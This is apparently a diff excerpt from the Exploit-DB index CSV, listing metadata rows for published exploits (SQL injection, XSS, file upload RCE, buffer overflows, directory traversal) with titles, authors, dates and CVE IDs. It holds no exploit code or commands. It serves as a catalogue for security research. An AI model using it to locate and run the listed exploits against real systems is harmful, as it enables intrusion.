28944,exploits/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php,,2006-11-08,2013-10-14,1,,,,,,https://www.securityfocus.com/bid/20970/info
52108,exploits/php/webapps/52108.NA,"ABB Cylon Aspect 3.08.01 - Arbitrary File Delete",2025-04-02,LiquidWorm,webapps,php,,2025-04-02,2025-04-02,0,CVE-2024-6209,,,,,
8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54287;CVE-2009-1550,,,,,
45836,exploits/php/webapps/45836.txt,"ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80,2018-11-13,2018-11-13,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comabc_v_0_6_4.zip,
4338,exploits/php/webapps/4338.pl,"ABC estore 3.0 - 'cat_id' Blind SQL Injection",2007-08-29,k1tk4t,webapps,php,,2007-08-28,,1,OSVDB-38434;CVE-2007-4627,,,,,
@ -17930,6 +17933,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33874,exploits/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Vulnerabilities",2010-04-26,"Richard Moore",webapps,php,,2010-04-26,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/39679/info
45681,exploits/php/webapps/45681.txt,"Ekushey Project Manager CRM 3.1 - Cross-Site Scripting",2018-10-25,"Ismail Tasdelen",webapps,php,80,2018-10-25,2018-10-25,0,CVE-2018-18417,"Cross-Site Scripting (XSS)",,,,
46869,exploits/php/webapps/46869.py,"eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution",2019-05-20,liquidsky,webapps,php,,2019-05-20,2021-06-17,0,CVE-2019-12185,,,,,
52106,exploits/php/webapps/52106.NA,"Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS",2025-04-02,"arfaoui haythem",webapps,php,,2025-04-02,2025-04-02,0,CVE-2024-42831,,,,,
48705,exploits/php/webapps/48705.txt,"elaniin CMS - Authentication Bypass",2020-07-26,BKpatron,webapps,php,,2020-07-26,2020-07-26,0,,,,,,
47858,exploits/php/webapps/47858.txt,"elaniin CMS 1.0 - Authentication Bypass",2020-01-06,riamloo,webapps,php,,2020-01-06,2020-04-13,1,,,,,,
37054,exploits/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal",2015-05-18,pandujar,webapps,php,,2015-05-21,2015-05-21,0,CVE-2015-3337;OSVDB-121335,,,,,https://github.com/pandujar/elasticpwn/
@ -45066,6 +45070,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34943,exploits/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",remote,windows,,2010-11-01,2014-10-12,1,,,,,,https://www.securityfocus.com/bid/44569/info
36235,exploits/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Vulnerabilities",2011-10-14,"Luigi Auriemma",remote,windows,,2011-10-14,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/50133/info
12495,exploits/windows/remote/12495.pl,"ProSSHD 1.2 - (Authenticated) Remote (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",remote,windows,,2010-05-02,,1,,,,,http://www.exploit-db.comsshdlabp.exe,
52110,exploits/windows/remote/52110.txt,"ProSSHD 1.2 - Denial of Service (DOS)",2025-04-02,"Fernando Mengali",remote,windows,,2025-04-02,2025-04-02,0,CVE-2024-0725,,,,,
11618,exploits/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Remote Buffer Overflow",2010-03-02,"S2 Crew",remote,windows,,2010-03-01,,1,,,,,http://www.exploit-db.comsshdlabp.exe,
16346,exploits/windows/remote/16346.rb,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2016-10-27,1,CVE-2006-4948;OSVDB-29032,"Metasploit Framework (MSF)",,,http://www.exploit-db.comtftpdwin.exe,
3132,exploits/windows/remote/3132.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",remote,windows,69,2007-01-14,2016-10-27,1,OSVDB-29032;CVE-2006-4948,,,,http://www.exploit-db.comtftpdwin.exe,

Can't render this file because it is too large.